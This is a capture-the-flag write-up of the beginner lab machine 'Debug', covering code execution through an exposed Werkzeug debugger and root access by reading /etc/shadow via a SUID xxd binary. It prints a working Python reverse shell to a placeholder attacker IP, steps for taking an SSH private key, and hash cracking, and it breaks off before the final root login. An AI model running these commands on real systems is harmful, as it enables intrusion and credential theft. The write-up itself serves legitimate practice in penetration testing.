This is my sixth write up and I will be discussing my experience with the machine “Debug” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing, or want to boost their skills to take on the OSCP. This machine was listed as a beginner level box and was fairly easy in my opinion. An RCE exploit is discovered with Werkzeug Debugger giving us user. A SUID file is then leveraged with xxd grabbing the shadow file and breaking it with John the Ripper .
Step 1: Enumeration
I started off with two Nmap scans on this machine and stuck with the results from the first scan. My first scan used default scripts -sC and version detection -sV. The second scan gave me the same results and there were only two ports open for this machine so I started off with port 80.
I kicked off dirbuster to see what directories were available. I don't know about you guys but if I see something with the word “console” I am definitely going to start there.
Sure enough this sucker was hosting a Werkzeug Debugger console me to throw some python commands at it. I smelled an RCE the minute I laid eyes on this console so I tested it with a whoami command using python. Sure enough, it spit back at me with the user megan.
Now that I knew this thing was vulnerable I setup a netcat listener on my machine and threw in a python reverse shell command into the Werkzeug Debugger console grabbing the connection back on my machine. Had to cut down the python reverse shell command that I got off of pentestmonkeyby removing the python -c command and single quotes.
On my Kali machine:
nc -lvp 4444
In Werkzeug Debugger console typed this:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yourip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
There was a Metasploit module available for this exploit but I wanted to figure this out the manual way for discipline. Not all exploits will have a metasploit module so you have to work with what you got.
In case you were lazy…
Werkzeug Debug Shell Command Execution
Description This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never…
So, the shell was horrible on this machine as user. I ran the following commands to get a better shell.
python -c ‘import pty; pty.spawn("/bin/bash")’Ctrl-Z
After you hit Ctrl-Z type the following:
stty raw -echofgexport TERM=xterm
Browsing around I found that Megan has a .ssh directory with her private key id_rsa file exposed. I grabbed the private key and moved it to my machine. This gave me persistence on the server so I wouldn't have to keep rigging my shell. You can either send it back with netcat or just copy and paste the contents into a text file. I chose to be lazy and just copied it into a text editor on my kali machine.
Running ssh2john against it let me know that this key was not password protected. I connected back to the target machine with the following commands where my key was copied. I needed to change the permissions of the file first.
sudo chmod 600 <your key file name here>sudo ssh -i <your key file name here> firstname.lastname@example.org
Being back on the target server I pushed a LinEnum script to gather any information leading up to a privilege escalation exploit using a python simple server. You need to be in the same directory where the file you want to server is.
On my Kali box I ran:
python -m SimpleHTTPServer 80
On the target box to grab the file:
Now that my file was on the target machine I needed to make it executable then run it with the following commands:
chmod +x LinEnum.sh./LinEnum.sh
Scrolling through the results of the script an interesting SUID file caught my interest with xxd. Did some googling with the keywords “xxd exploit” and found that there is a way to grab the shadow file and extract the hashes using the following command:
xxd "/etc/shadow" | xxd -r
I focused on the root user password hash and copied the value into a text file back on my machine. I ran john the ripper default command which uses a default wordlist against the hash and captured the root password.
Now that I know the password I went back to the target machine and logged in as root with the discovered password using the following command: